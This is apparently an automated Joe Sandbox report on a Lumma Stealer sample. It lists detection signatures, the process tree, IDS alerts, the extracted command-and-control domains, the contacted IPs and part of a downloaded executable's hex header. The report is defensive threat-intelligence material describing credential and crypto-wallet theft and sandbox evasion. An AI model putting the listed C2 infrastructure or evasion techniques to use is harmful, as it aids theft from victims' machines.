Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559252
MD5:c295093aa18965205a72349f476a9cf3
SHA1:a6be2adb5b6cec99d08774cc16f97a0958e725fd
SHA256:e17a1dea3206e9cd29badca66347857b796122e12ed6017f0889bf8e196dcfd8
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C295093AA18965205A72349F476A9CF3)
    • chrome.exe (PID: 6320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 5420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2004,i,10944876540401575079,9840924559391252716,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 1396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 5788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1908,i,6104721456568846231,4380768281653123136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["peepburry828.sbs", "p3ar11fter.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1382418436.000000000117B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1399975749.0000000001180000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1385490600.0000000001180000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1384589859.0000000001180000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 5 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T10:54:20.492456+010020283713Unknown Traffic192.168.2.749719188.114.96.3443TCP
              2024-11-20T10:54:21.466636+010020283713Unknown Traffic192.168.2.749725188.114.96.3443TCP
              2024-11-20T10:54:22.871245+010020283713Unknown Traffic192.168.2.749736188.114.96.3443TCP
              2024-11-20T10:54:24.290685+010020283713Unknown Traffic192.168.2.749747188.114.96.3443TCP
              2024-11-20T10:54:26.082894+010020283713Unknown Traffic192.168.2.749758188.114.96.3443TCP
              2024-11-20T10:54:27.704193+010020283713Unknown Traffic192.168.2.749769188.114.96.3443TCP
              2024-11-20T10:54:28.913916+010020283713Unknown Traffic192.168.2.749780188.114.96.3443TCP
              2024-11-20T10:54:32.877688+010020283713Unknown Traffic192.168.2.749806188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T10:54:20.934369+010020546531A Network Trojan was detected192.168.2.749719188.114.96.3443TCP
              2024-11-20T10:54:21.872415+010020546531A Network Trojan was detected192.168.2.749725188.114.96.3443TCP
              2024-11-20T10:54:33.150067+010020546531A Network Trojan was detected192.168.2.749806188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T10:54:20.934369+010020498361A Network Trojan was detected192.168.2.749719188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T10:54:21.872415+010020498121A Network Trojan was detected192.168.2.749725188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T10:54:33.875455+010020197142Potentially Bad Traffic192.168.2.749812185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T10:54:23.630000+010020480941Malware Command and Control Activity Detected192.168.2.749736188.114.96.3443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: https://cook-rain.sbs/&MUAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/lOrAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apiTAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apiQAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/tLjAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apivalueAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apiKAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apirAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/qAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/api22IAvira URL Cloud: Label: malware
              Source: file.exe.7724.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["peepburry828.sbs", "p3ar11fter.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}
              Source: file.exeReversingLabs: Detection: 42%
              Source: file.exeJoe Sandbox ML: detected
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.7:49816 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49932 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49944 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.7:50082 version: TLS 1.2
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.1549303423.0000000008210000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1684642636.0000000006122000.00000040.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49719 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49719 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49736 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49725 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49725 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49806 -> 188.114.96.3:443
              Source: Malware configuration extractorURLs: peepburry828.sbs
              Source: Malware configuration extractorURLs: p3ar11fter.sbs
              Source: Malware configuration extractorURLs: p10tgrace.sbs
              Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
              Source: Malware configuration extractorURLs: processhol.sbs
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:54:33 GMTContent-Type: application/octet-streamContent-Length: 2741248Last-Modified: Wed, 20 Nov 2024 09:40:15 GMTConnection: keep-aliveETag: "673dae7f-29d400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 f4 14 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 67 67 79 65 6e 6e 70 00 80 29 00 00 a0 00 00 00 72 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 65 66 74 72 65 73 69 00 20 00 00 00 20 2a 00 00 06 00 00 00 ac 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
              Source: Joe Sandbox ViewIP Address: 13.107.246.44 13.107.246.44
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49747 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49736 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49758 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49719 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49769 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49780 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49806 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49812 -> 185.215.113.16:80
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
